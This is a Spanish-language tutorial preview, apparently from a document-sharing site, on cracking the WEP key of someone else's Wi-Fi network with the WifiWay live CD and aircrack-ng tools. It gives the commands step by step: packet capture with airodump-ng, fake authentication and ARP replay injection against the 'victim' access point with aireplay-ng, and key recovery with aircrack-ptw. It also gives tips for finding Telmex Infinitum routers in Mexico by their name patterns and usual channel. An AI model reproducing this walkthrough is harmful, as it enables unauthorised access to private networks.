Tutorial wifi way

Solo disponible en BuenasTareas
  • Páginas : 14 (3349 palabras )
  • Descarga(s) : 0
  • Publicado : 4 de diciembre de 2010
Leer documento completo
Vista previa del texto
Tutorial:

Primero, hay que bajarse esta distribución Linux: wifiway 0.4, clic en el link y en la pagina que se abre bajen el .iso, después graben la imagen en un CD.

Arrancamos el LiveCD y entramos en el modo startx.

Ok, habiendo hecho esto aquí empieza el verdadero proceso. Vamos a la carpeta:

/sys/class/net/wifi0/device/

y abrimos archivo channel. Ponemos 1, guardamos y cerramosarchivo. (Problemas con este paso? Ve a las notas)

A continuación abrimos una terminal y escribimos:

airodump-ng rtap0

vamos a ver como empiezan a aparecer redes. Presionamos Ctrl + C para detener el proceso. Tomamos nota del BSSID de la red que queremos crackear. A continuación vamos a la carpeta en la que ya estábamos (device) y ahora abrimos el archivo:

BSSID
en este archivocopiamos el BSSID de la red que elegimos, lo guardamos y lo cerramos. (atención: a algunas personas les causa problemas cerrar este archivo despues de guardarlo. Prueben dejándolo abierto o también cerrándolo pero verifiquen que la BSSID quedo guardada).

Ahora empezamos a capturar paquetes con el siguiente comando:

airodump-ng -c CANAL DEL AP -w ARCHIVO GUARDA IVS rtap0

Donde:
Canal del AP: esel numero que aparece debajo de CH en la primer lista de redes que vimos.
Archivo guarda IVs: es el nombre de un archivo para que guarde todo lo capturado. Elijan el nombre.

Después de hacerlo vemos que empieza el proceso de captura de paquetes.

Vamos de nuevo a la carpeta Device y ahora abrimos el archivo rate, lo ponemos con valor 2 lo guardamos y lo cerramos.

Abrimos otra terminal yahora necesitamos saber nuestro numero MAC de la tarjeta inalámbrica. Lo hacemos por medio de:

ifconfig wifi0 up
y luego

ifconfig
Es un numero de 12 digitos que viene etiquetado como HRDAW (o algo asi) en el apartado wifi0.

Lo que haremos ahora sera asociarnos al Access Point (red) victima utilizando el siguiente comando:

aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
Donde:BSSID: es el numero que elegimos al principio, el MAC del Access Point victima (12 digitos).
MAC WIFI0: es el numero MAC que acabamos de obtener de nuestra tarjeta inalámbrica.
ESSID: Es el nombre del AP victima, aparece en la terminal donde estamos capturando paquetes, es la ultima columna hasta la derecha (Los usuarios de Infinitum en México normalmente tienen: 2WIRE + un numero menor que 999o también INFINITUM + un numero menor que 9999 ).

Cuando la autentificación y la asociación sean exitosas abrimos otra terminal y ejecutamos el siguiente comando:

aireplay-ng -3 -b BSSID -h MAC WIFI0 wifi0

BSSID: Es lo mismo que en el anterior.
MAC WIFI0: Lo mismo que en el anterior.

Hecho esto los paquetes(#Data) en la terminal donde tenemos al airodump deberán de empezar a subirpara el Access Point elegido.

Esperamos a que junte un mínimo de 30,000 #Data. Cuando este por encima de ese valor, ejecutamos:

aircrack-ptw ARCHIVO GUARDA IVS.cap
Donde:
ARCHIVO GUARDA IVS: Es el nombre que dimos al principio al archivo para que guardara IV's. OJO: deberás de poner un numero que corresponde a las veces que has capturado paquetes en esta sesión. Por ejemplo, si el nombre queasignamos al archivo fue WEP y si es la primera vez que capturas paquetes en esta sesión, el nombre que usaras aquí sería: WEP-01.cap esto también lo puedes verificar en la carpeta root.

En unos instantes te deberá aparecer la clave, en el renglón que diga Found Key. Si no aparece espera a que junte mas paquetes y vuelve a ejecutar este ultimo comando. Puede llegar a requerir hasta 100,000 omas.

Notas:

Prueben varios valores de channel: si no aparece ninguna red en el airodump pero sabes que debería de aparecer alguna, entonces prueba con otros valores en channel. El rango posible es entre 1 y 11. No olvides guardar el archivo cuando lo modifiques. Otra cosa con respecto a esto, lectores de México, los routers 2Wire de Infinitum de Telmex vienen normalmente en canal 6.
Como...
tracking img